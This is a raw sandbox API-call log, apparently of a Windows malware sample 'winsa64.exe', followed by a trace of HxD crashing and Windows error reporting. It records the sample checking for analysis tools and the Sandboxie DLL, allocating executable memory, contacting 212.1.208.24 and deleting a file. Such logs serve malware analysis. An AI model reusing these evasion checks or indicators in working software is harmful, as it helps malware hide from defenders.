LoadLibrary(oleaut32.dll) [c:\windows\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\windows\winsa64.exe]
LoadLibrary(ole32.dll) [c:\windows\winsa64.exe]
LoadLibrary(version.dll) [c:\windows\winsa64.exe]
LoadLibrary(gdi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(wininet.dll) [c:\windows\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\windows\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\windows\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\windows\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\windows\winsa64.exe]
LoadLibrary(lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\windows\winsa64.exe]
VirtualQueryEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\winsa64.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Kernel32) [c:\windows\winsa64.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\winsa64.exe]
OpenProcessToken(C:\WINDOWS\winsa64.exe) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\winsa64.exe]
ResumeThread() [c:\windows\winsa64.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\windows\winsa64.exe]
OpenProcess(winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(USER32) [c:\windows\winsa64.exe]
LoadLibrary(imm32.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_NOACCESS) [c:\windows\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\windows\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\windows\winsa64.exe]
IsDebuggerPresent() [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\windows\winsa64.exe]
BitBlt() [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_EXECUTE_READWRITE) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(version.dll) [c:\windows\winsa64.exe]
FreeLibrary() [c:\windows\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\windows\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\windows\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\windows\winsa64.exe]
LoadLibrary(shell32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(INSONIA) [c:\windows\winsa64.exe]
CreateFile(C:\WINDOWS\winsa64.cfg) [c:\windows\winsa64.exe]
Sleep(100) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\windows\winsa64.exe]
LoadLibrary(hnetcfg.dll) [c:\windows\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\windows\winsa64.exe]
LoadLibrary(dnsapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\winrnr.dll) [c:\windows\winsa64.exe]
LoadLibrary(wldap32.dll) [c:\windows\winsa64.exe]
LoadLibrary(rasadhlp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(ws2_32.dll) [c:\windows\winsa64.exe]
connect( 212.1.208.24:80 ) [c:\windows\winsa64.exe]
DeleteFile(C:\WINDOWS\a.exe) [c:\windows\winsa64.exe]
Sleep(60000000) [c:\windows\winsa64.exe]
Executing: c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(comdlg32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(STATIC,000003C4_PID_FastMM) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(psapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMENUANIMATION,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(TXmInstanceManager,HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetWindowTextLength() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETKEYBOARDCUES,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SetTimer(1098a) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(xpsp2res.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(xpsp3res.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SetTimer(0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MSCTF.Shared.MUTEX.EBH) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetKeyState() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenService(AudioSrv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wdmaud.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\setupapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\wdmaud.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msacm32.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msacm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\msacm32.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(midimap.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MidiMapper_modLongMessage_RefCnt) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MidiMapper_Configure) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\midimap.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\faultrep.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winsta.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wtsapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateFile(C:\DOCUME~1\r32\CONFIG~1\Temp\74b4_appcompat.txt) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPMODULE,964) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\apphelp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\apphelp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateProcess((null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\dwwin.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(dwwin.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
WriteProcessMemory(c:\windows\system32\dwwin.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\dwwin.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
Executing: c:\windows\system32\dwwin.exe
LoadLibrary(advapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(comctl32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(gdi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(kernel32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(oleaut32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msvcrt.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(ole32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shell32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shlwapi.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(urlmon.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(iertutil.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(user32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(version.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(wininet.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(normaliz.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shimeng.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\apppatch\acgenral.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(kernel32.dll) [c:\windows\system32\dwwin.exe]
VirtualQueryEx(c:\windows\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
CreateMutex(SHIMLIB_LOG_MUTEX) [c:\windows\system32\dwwin.exe]
LoadLibrary(winmm.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msacm32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(userenv.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(uxtheme.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(lz32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(lz32.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(Kernel32) [c:\windows\system32\dwwin.exe]
GetModuleHandle(LPK.DLL) [c:\windows\system32\dwwin.exe]
OpenProcess(dwwin.exe) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\system32\dwwin.exe]
GetModuleHandle(USER32) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\system32\dwwin.exe]
OpenProcessToken(C:\WINDOWS\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\system32\dwwin.exe]
LoadLibrary(imm32.dll) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\system32\dwwin.exe]
ResumeThread() [c:\windows\system32\dwwin.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\system32\dwwin.exe]
CreateEvent(DINPUTWINMM) [c:\windows\system32\dwwin.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\windows\system32\dwwin.exe]
IsDebuggerPresent() [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\UxTheme.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(riched20.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shfolder.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\SHELL32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\shfolder.dll) [c:\windows\system32\dwwin.exe]
BitBlt() [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
SetTimer(20996) [c:\windows\system32\dwwin.exe]
FreeLibrary() [c:\windows\system32\dwwin.exe]
CreateFile(C:\DOCUME~1\r32\CONFIG~1\Temp\597A56.dmp) [c:\windows\system32\dwwin.exe]
GetModuleHandle(NTDLL.DLL) [c:\windows\system32\dwwin.exe]
LoadLibrary(psapi.dll) [c:\windows\system32\dwwin.exe]
OpenProcess(HxD.exe) [c:\windows\system32\dwwin.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\windows\system32\dwwin.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPTHREAD,964) [c:\windows\system32\dwwin.exe]
QuerySystemInformation() [c:\windows\system32\dwwin.exe]
SuspendThread(1808) [c:\windows\system32\dwwin.exe]
SuspendThread(1800) [c:\windows\system32\dwwin.exe]
SuspendThread(1796) [c:\windows\system32\dwwin.exe]
SuspendThread(1792) [c:\windows\system32\dwwin.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPALL,964) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\USER32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\GDI32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\rpcrt4.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\RPCRT4.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\secur32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\Secur32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\OLEAUT32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msvcrt.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ole32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\VERSION.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\windows\system32\dwwin.exe]
